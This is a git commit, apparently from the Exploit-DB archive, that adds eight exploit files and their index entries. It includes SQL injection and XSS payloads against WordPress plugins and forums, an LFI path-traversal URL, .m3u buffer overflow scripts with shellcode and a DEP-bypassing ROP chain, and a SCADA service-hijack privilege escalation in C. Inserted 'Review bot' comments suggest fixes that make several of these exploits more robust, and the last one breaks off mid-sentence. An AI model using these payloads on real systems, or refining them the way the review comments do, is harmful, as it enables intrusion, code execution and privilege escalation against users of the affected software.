DB: 2016-07-08
8 new exploits:
WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities
WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities
Codoforum 3.4 - Stored Cross-Site Scripting
MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit
VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)
Core FTP LE 2.2 - Path Field Local Buffer Overflow
OPAC KpwinSQL - Multiple Vulnerabilities
GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation
This commit is contained in:
parent
52cf6a3185
commit
c7daadde64
9 changed files with 433 additions and 0 deletions
@ -36002,6 +36002,8 @@ id,file,description,date,author,platform,type,port
|
|||
39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
|
||||
39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
|
||||
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
|
||||
39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
|
||||
39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
|
||||
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
|
||||
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
|
||||
39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
|
||||
|
@ -36196,7 +36198,10 @@ id,file,description,date,author,platform,type,port
|
|||
40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80
|
||||
40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router – Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
|
||||
40015,platforms/php/webapps/40015.txt,"Codoforum 3.4 - Stored Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80
|
||||
40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80
|
||||
40017,platforms/windows/local/40017.py,"MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
|
||||
40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
|
||||
40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80
|
||||
40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0
|
||||
40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
|
||||
|
@ -36215,6 +36220,7 @@ id,file,description,date,author,platform,type,port
|
|||
40035,platforms/multiple/dos/40035.txt,"Symantec Antivirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
|
||||
40036,platforms/multiple/dos/40036.txt,"Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
|
||||
40037,platforms/multiple/dos/40037.txt,"Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
|
||||
40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0
|
||||
40039,platforms/win32/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win32,local,0
|
||||
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit",2016-06-29,Cr4sh,windows,local,0
|
||||
40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
|
||||
|
@ -36238,3 +36244,5 @@ id,file,description,date,author,platform,type,port
|
|||
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
|
||||
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
|
||||
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
|
||||
40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
|
||||
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
|
||||
|
|
71
platforms/php/webapps/39806.txt
Executable file
71
platforms/php/webapps/39806.txt
Executable file
|
@ -0,0 +1,71 @@
|
|||
# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
|
||||
# Google Dork: inurl:"wp-content/plugins/q-and-a"
|
||||
# Date: 12-05-2016
|
||||
# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
|
||||
# Version: 1.3.9.7 and prior
|
||||
# Exploit Author: Gwendal Le Coguic
|
||||
# Website: http://10degres.net
|
||||
# Category: webapps
|
||||
|
||||
|
||||
Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
|
||||
A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.
|
||||
|
||||
The plugin was originally named "Q and A FAQ" and developped by Raygun company
|
||||
then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.
|
||||
|
||||
|
||||
##### Full Path Disclosure #####
|
||||
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
|
||||
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php
|
||||
|
||||
|
||||
##### SQL Injection #####
|
||||
|
||||
Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.
|
||||
|
||||
Paramater hdnParentID is vulnerable in two places.
|
||||
Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)
|
||||
|
||||
1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...
|
||||
|
||||
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
|
||||
Host: [target]
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 165
|
||||
|
||||
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0
|
||||
|
||||
|
||||
2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...
|
||||
|
||||
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
|
||||
Host: [target]
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 84
|
||||
|
||||
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0
|
||||
|
||||
|
||||
##### References #####
|
||||
|
||||
https://www.owasp.org/index.php/Full_Path_Disclosure
|
||||
https://www.owasp.org/index.php/SQL_Injection
|
||||
|
62
platforms/php/webapps/39807.txt
Executable file
62
platforms/php/webapps/39807.txt
Executable file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
|
||||
# Google Dork: inurl:"wp-content/plugins/gallery-images/"
|
||||
# Date: 12-05-2016
|
||||
# Software Link: https://fr.wordpress.org/plugins/gallery-images/
|
||||
# Version: 1.8.9 and prior
|
||||
# Exploit Author: Gwendal Le Coguic
|
||||
# Website: http://10degres.net
|
||||
# Category: webapps
|
||||
|
||||
|
||||
##### About #####
|
||||
|
||||
Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.
|
||||
|
||||
|
||||
##### Full Path Disclosure #####
|
||||
|
||||
http://[target]/wp-content/plugins/gallery-images/gallery-images.php
|
||||
|
||||
|
||||
##### SQL Injection #####
|
||||
|
||||
Headers X-Forwarded-For and Client-Ip are vulnerable.
|
||||
Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
|
||||
Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
|
||||
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: [target]
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Client-Ip: 123.123.123.123
|
||||
X-Forwarded-For: 123.123.123.123
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 89
|
||||
|
||||
action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100
|
||||
|
||||
|
||||
### Extras infos #####
|
||||
|
||||
The "galleryid" must be configured or try another id.
|
||||
|
||||
You don't need to be authed to exploit the injection but the plugin must be enable.
|
||||
|
||||
"task" parameter can be:
|
||||
load_images_content
|
||||
load_images_lightbox
|
||||
load_image_justified
|
||||
load_image_thumbnail
|
||||
load_blog_view
|
||||
|
||||
Client-Ip overwrite X-Forwarded-For.
|
||||
Some system drop those headers.
|
||||
|
||||
|
||||
##### References #####
|
||||
|
||||
https://www.owasp.org/index.php/Full_Path_Disclosure
|
||||
https://www.owasp.org/index.php/SQL_Injection
|
||||
|
31
platforms/php/webapps/40015.txt
Executable file
31
platforms/php/webapps/40015.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)
|
||||
# Google Dork: intext:"powered by codoforum"
|
||||
# Date: 01/06/2016
|
||||
# Exploit Author: Ahmed Sherif (OffensiveBits)
|
||||
# Vendor Homepage: http://codologic.com/page/
|
||||
# Software Link: http://codoforum.com/index.php
|
||||
# Version: V3.4
|
||||
# Tested on: Linux Mint
|
||||
|
||||
|
||||
1. Description:
|
||||
|
||||
The Reply and search functionalities are both vulnerable to Stored XSS due
|
||||
to improper filtration in displaying the content of replies.
|
||||
|
||||
|
||||
2. Steps to reproduce the vulnerability:
|
||||
|
||||
|
||||
1. Login to your account.
|
||||
2. look for any topic and add a reply .
|
||||
3. in the reply textbox add a widely used common keyword within xss
|
||||
payload for example : (keyword"><svg/onload=prompt(document.cookie)>)
|
||||
4. while any user surfing the topic and started to search for specific
|
||||
keywords the javascript code will be executed.
|
||||
|
||||
|
||||
|
||||
3. Solution:
|
||||
|
||||
The new version of codoforum will be released this week.
|
36
platforms/php/webapps/40068.txt
Executable file
36
platforms/php/webapps/40068.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
OPAC KpwinSQL LFI/XSS Vulnerabilities
|
||||
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Product Website : http://www.kpsys.cz/
|
||||
Affected version: All
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
|
||||
Description:
|
||||
KpwinSQL suffers from an unauthenticated file inclusion vulnerability (LFI) when input passed thru the 'lang' parameter to the following scripts which are not properly verified:
|
||||
+ index.php
|
||||
+ help.php
|
||||
+ logpin.php
|
||||
+ brow.php
|
||||
+ indexs.php
|
||||
+ search.php
|
||||
+ hledani.php
|
||||
+ hled_hesl.php
|
||||
before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
|
||||
|
||||
Moreover, KpwinSQL system suffers from Cross Site Scripting vulnerability when input passed thru the 'vyhl' parameter to 'index.php' script which does not perform input validation.
|
||||
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Tested on: Apache/2.2.11 (Win32)
|
||||
PHP/5.2.9-2
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Vulnerabilities discovered by Yakir Wizman
|
||||
https://www.linkedin.com/in/yakirwizman
|
||||
Date: 06.07.2016
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Proof Of Concept:
|
||||
|
||||
Local File Inclusion example:
|
||||
http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
|
||||
|
||||
Cross Site Scripting example:
|
||||
http://server/index.php?vyhl='><script>alert('XSS')</script>&lang=cze
|
33
platforms/windows/dos/40038.py
Executable file
33
platforms/windows/dos/40038.py
Executable file
|
@ -0,0 +1,33 @@
|
|||
'''
|
||||
# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC
|
||||
# Date: 2016-6-28
|
||||
# Exploit Author: Netfairy
|
||||
# Vendor Homepage: http://www.coreftp.com/
|
||||
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
|
||||
# Version: 2.2
|
||||
# Tested on: Windows7 Professional SP1 En x86
|
||||
# CVE : N/A
|
||||
[+] Type : Buffer overflow
|
||||
[+] Detail :
|
||||
[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
|
||||
[-] enter the application and Input "A"*800 to the path box the press enter
|
||||
[-] crash info
|
||||
0:008> g
|
||||
(4d48.4cc8): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=00000001 ebx=00440770 ecx=00410041 edx=007c4ee4 esi=00000000 edi=01b1efe8
|
||||
eip=00410041 esp=0012d6a0 ebp=00410041 iopl=0 nv up ei pl nz na po nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
|
||||
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\CoreFTP\coreftp.exe
|
||||
coreftp+0x10041:
|
||||
00410041 008b45fc8be5 add byte ptr [ebx-1A7403BBh],cl ds:0023:e5d003b5=??
|
||||
|
||||
|
||||
########generate "A"*800
|
||||
'''
|
||||
|
||||
import struct
|
||||
junk = "A" * 800
|
||||
with open("exp.txt","wb") as f :
|
||||
f.write(junk)
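Review bot: The in-file title `# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC` disagrees with the files.csv entry in this same commit ("Core FTP LE 2.2 - Path Field Local Buffer Overflow") and with the download link `ftp://ftp.coreftp.com/coreftplite.exe`, which both point at what looks like the LE client rather than a server product, so someone triaging their estate from the header alone could look at the wrong software; the title line should read `# Exploit Title: Core FTP LE 2.2 - Path Field Local Buffer Overflow (PoC)` to match the index. `import struct` is never used and can be dropped. Writing a `str` to a handle opened with `"wb"` only works under Python 2, which the header does not state; a `# Python: 2.x` line next to `# Tested on:` would save the next reader a confusing TypeError.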
|
45
platforms/windows/local/40017.py
Executable file
45
platforms/windows/local/40017.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
|
||||
# Date: 25-June-2016
|
||||
# Exploit Author: Sibusiso Sishi
|
||||
# Email: sibusiso [at] IronSky [dot] co.za
|
||||
# Vendor Homepage: http://www.mediacoderhq.com/
|
||||
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
|
||||
# Version: 0.8.43.5830
|
||||
# Tested on: Windows XP SP3 EN
|
||||
|
||||
|
||||
|
||||
#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
|
||||
shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
|
||||
"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
|
||||
"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
|
||||
"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
|
||||
"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
|
||||
"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
|
||||
"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
|
||||
"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
|
||||
"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
|
||||
"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
|
||||
"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
|
||||
"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
|
||||
"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
|
||||
"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
|
||||
"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")
|
||||
|
||||
|
||||
seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
|
||||
nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
|
||||
nop_sled = "\x90" * 14
|
||||
|
||||
buff = "http:// "
|
||||
buff += "A" * 776
|
||||
buff += nseh
|
||||
buff += seh
|
||||
buff += nop_sled
|
||||
buff += shellcode
|
||||
buff += "D" * (4216 - (len(shellcode + nop_sled)))
|
||||
fo = open("foo.m3u", "wb")
|
||||
fo.write (buff)
|
||||
fo.close()
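Review bot: The handle opened at `fo = open("foo.m3u", "wb")` is closed by hand two lines later, so an exception in `fo.write` leaks it; `with open("foo.m3u", "wb") as fo: fo.write(buff)` is the idiom and matches the form the sibling 40038.py in this commit already uses. `buff = "http:// "` carries a trailing space that is presumably deliberate, since the padding counts are built on top of it, but nothing says so; a comment such as `# trailing space is intentional, part of the prefix the pad lengths assume` would stop it being "tidied" away. The script is Python 2 only (a `str` is written to a binary handle), which the header should state alongside `# Tested on:`.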
|
88
platforms/windows/local/40018.py
Executable file
88
platforms/windows/local/40018.py
Executable file
|
@ -0,0 +1,88 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Exploit Title: VUPlayer <=2.49 .M3u Buffer overflow exploit with DEP bypass
|
||||
# Date: 26-06-2016
|
||||
# Exploit Author: secfigo
|
||||
# Vendor Homepage: http://vuplayer.com/
|
||||
# Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe
|
||||
# Version: VUPlayer <=2.49
|
||||
# Tested on: Windows 7 SP1 DEP=alwayson
|
||||
# Greetz: Raghu, nullSingapore
|
||||
###################################################################################
|
||||
|
||||
|
||||
import struct
|
||||
|
||||
###################################################################################
|
||||
# Shellcode
|
||||
# windows/exec CMD=calc.exe with size 227 and bad characters "\x00\x09\x0a\x0d\x1a"
|
||||
###################################################################################
|
||||
|
||||
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
|
||||
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
|
||||
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
|
||||
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
|
||||
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
|
||||
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
|
||||
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
|
||||
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
|
||||
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
|
||||
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
|
||||
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
|
||||
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
|
||||
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
|
||||
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
|
||||
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
|
||||
"\x1c\x80")
|
||||
|
||||
junk = "HTTP://" + "A"*1005
|
||||
|
||||
|
||||
|
||||
|
||||
###################################################################################
|
||||
# rop gadgets with some modifications
|
||||
# bad characters = "\x00\x09\x0a\x0d\x1a"
|
||||
###################################################################################
|
||||
|
||||
def create_rop_chain():
|
||||
|
||||
# rop chain generated with mona.py - www.corelan.be
|
||||
rop_gadgets = [
|
||||
0x10010157, # POP EBP # RETN [BASS.dll]
|
||||
0x10010157, # skip 4 bytes [BASS.dll]
|
||||
0x10015f77, # POP EAX # RETN [BASS.dll]
|
||||
0xfffffdff, # Value to negate, will become 0x00000201
|
||||
0x10014db4, # NEG EAX # RETN [BASS.dll]
|
||||
0x10032f72, # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
|
||||
0x10015f82, # POP EAX # RETN [BASS.dll]
|
||||
0xffffffc0, # Value to negate, will become 0x00000040
|
||||
0x10014db4, # NEG EAX # RETN [BASS.dll]
|
||||
0x10038a6d, # XCHG EAX,EDX # RETN [BASS.dll]
|
||||
0x101049ec, # POP ECX # RETN [BASSWMA.dll]
|
||||
0x101082db, # &Writable location [BASSWMA.dll]
|
||||
0x1001621c, # POP EDI # RETN [BASS.dll]
|
||||
0x1001dc05, # RETN (ROP NOP) [BASS.dll]
|
||||
0x10604154, # POP ESI # RETN [BASSMIDI.dll]
|
||||
0x10101c02, # JMP [EAX] [BASSWMA.dll]
|
||||
0x10015fe7, # POP EAX # RETN [BASS.dll]
|
||||
0x1060e25c, # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
|
||||
0x1001d7a5, # PUSHAD # RETN [BASS.dll]
|
||||
0x10022aa7, # ptr to 'jmp esp' [BASS.dll]
|
||||
]
|
||||
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
|
||||
|
||||
rop_chain = create_rop_chain()
|
||||
|
||||
|
||||
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
|
||||
|
||||
nops ="\x90"* 16
|
||||
|
||||
buffer = junk + eip + rop_chain + nops+ shellcode+ "C"*(3000-len(junk)-len(eip)-len(rop_chain)-len(nops)-len(shellcode))
|
||||
|
||||
print "[+] Creating .m3u file of size "+ str(len(buffer))
|
||||
file = open('vuplayer-dep.m3u','w');
|
||||
file.write(buffer);
|
||||
file.close();
|
||||
print "[+] Done creating the file"
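Review bot: `file = open('vuplayer-dep.m3u','w');` shadows the Python 2 builtin `file`, and the trailing semicolons on that line and the two that follow are not Python style; `with open('vuplayer-dep.m3u', 'wb') as out: out.write(buffer)` is the idiom and uses the same binary mode the sibling 40017.py and 40038.py in this commit use, so the three scripts read consistently. The `print` statements and the `str` written to the file pin the script to Python 2, which the header block does not mention; a `# Python: 2.x` line next to `# Tested on:` would make that explicit. `buffer` also shadows a Python 2 builtin, and a name such as `m3u_data` would read better.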
|
59
platforms/windows/local/40069.cpp
Executable file
59
platforms/windows/local/40069.cpp
Executable file
|
@ -0,0 +1,59 @@
|
|||
/*
|
||||
# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)
|
||||
# Vulnerability Discovery and Exploit Author: Zhou Yu
|
||||
# Email: <504137480@qq.com>
|
||||
# Version: 8.2
|
||||
# Tested on: Windows 7 SP1 X32
|
||||
# CVE : None
|
||||
|
||||
Vulnerability Description:
|
||||
SERVICE_CHANGE_CONFIG Privilege Escalation
|
||||
C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy
|
||||
CimProxy
|
||||
Medium Mandatory Level (Default) [No-Write-Up]
|
||||
RW Everyone
|
||||
SERVICE_ALL_ACCESS
|
||||
|
||||
C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy
|
||||
[SC] QueryServiceConfig <EFBFBD>ɹ<EFBFBD>
|
||||
|
||||
SERVICE_NAME: CimProxy
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim
|
||||
Proxy.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : CIMPLICITY Proxy Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
Usage:
|
||||
Put evil.exe and the exploit in the same folder and then run the exploit.
|
||||
*/
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
void main()
|
||||
{
|
||||
char szPath[MAX_PATH];
|
||||
char *t;
|
||||
GetModuleFileName(NULL,szPath,MAX_PATH);
|
||||
t = strrchr(szPath, 0x5C);
|
||||
t[0] = '\\';
|
||||
t[1] = '\0';
|
||||
strcat(szPath,"evil.exe\"");
|
||||
char t1[] = "\"cmd.exe /c ";
|
||||
char payload[] = "sc config CimProxy binPath= ";
|
||||
strcat(t1,szPath);
|
||||
strcat(payload,t1);
|
||||
|
||||
system(payload);
|
||||
//stop service
|
||||
printf("stop service!\n");
|
||||
system("net stop CimProxy");
|
||||
//start service
|
||||
printf("start service!\n");
|
||||
system("net start CimProxy");
|
||||
|
||||
}
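Review bot: `strcat(t1,szPath)` and `strcat(payload,t1)` write past the end of `t1` and `payload`, which are sized exactly to their string literals (13 and 29 bytes), so the command line is assembled through a stack buffer overflow and whether it runs at all depends on stack layout; `GetModuleFileName` and `strrchr` are also unchecked, so a missing backslash would dereference NULL at `t[0]`, and `strcat(szPath,"evil.exe\"")` can itself exceed `MAX_PATH`. Building the string once into a buffer sized for it removes all of these: `char cmd[MAX_PATH + 64]; if (!t || snprintf(cmd, sizeof cmd, "sc config CimProxy binPath= \"cmd.exe /c %s", szPath) >= (int)sizeof cmd) return 1;` followed by `system(cmd);`. `void main()` is not a standard signature; `int main(void)` with a return value is. The header records the cause (the accesschk output shows Everyone holding SERVICE_ALL_ACCESS on CimProxy) but not the remediation, and a line such as `Remediation: remove write access 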